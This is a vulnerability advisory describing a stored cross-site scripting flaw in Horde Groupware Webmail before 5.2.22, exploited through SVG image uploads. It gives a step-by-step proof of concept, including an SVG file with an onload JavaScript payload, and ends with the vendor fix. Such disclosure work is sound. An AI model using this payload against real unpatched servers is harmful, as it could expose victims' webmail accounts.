Horde Groupware Webmail Stored Cross-Site Scripting (XSS) via SVG

Summary

The image view functionality in Horde Groupware Webmail Edition before 5.2.22 is affected by a stored Cross-Site Scripting (XSS) vulnerability via an SVG image upload containing a JavaScript payload. An attacker can obtain access to a victim’s webmail account by making them visit a malicious URL.

Product description (from vendor)

“Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks and notes with the standards compliant components from the Horde Project. Horde Groupware Webmail Edition bundles the separately available applications IMP, Ingo, Turba, Kronolith, Nag, Mnemo, Gollem, and Trean.”. For more information visit http://www.horde.org/apps/webmail.

CVE(s)

Details

Root cause analysis

An authenticated user can attach a SVG image file to an email, once the upload of the file is finished the image will be available at [horde's webroot]/services/images/view.php?f=Horde<image_unique_code>. SVG files can contain JavaScript code, which is intepreted by the browser in case the user views the image directly (for example through the /services/images/view.php endpoint mentioned above).

Proof of concept

  1. Login to Horde Groupware Webmail;
  2. Navigate to ‘Address Book’ > ‘New contact’;
  3. Setup an HTTP proxy, such as PortSwigger Burp (https://portswigger.net/burp) and start recording the HTTP communications;
  4. Insert an arbitrary last name and upload the following SVG file as Photo:
1
2
3
4
5
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD
SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg
onload="alert(document.domain)"
xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face
font-family="y"/></font></defs></svg>
  1. Look at the HTTP response and find the image URL, it looks roughly like the following:
1
2
showImage('/services/images/view.php?f=Hordea0qj7I&amp;a=rotate&amp;v=270',
'_p_object_photo_', true);

which translates to [horde's webroot]/services/images/view.php?f=Hordea0qj7I;

  1. Open it in the browser;
  2. The JavaScript code included in the image is executed in the browser context.

Impact

An unauthenticated attacker might be able to gain access to the victim’s webmail by making them visit an SVG URL which triggers the stored XSS vulnerability.

Remediation

The /services/images/view.php now sets the Content-disposition: attachment HTTP header, forcing the web browser to download the image. Upgrade to Horde Groupware Webmail 5.2.22 or later.

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

Credits

`polict` of Shielder

Data

20 April 2020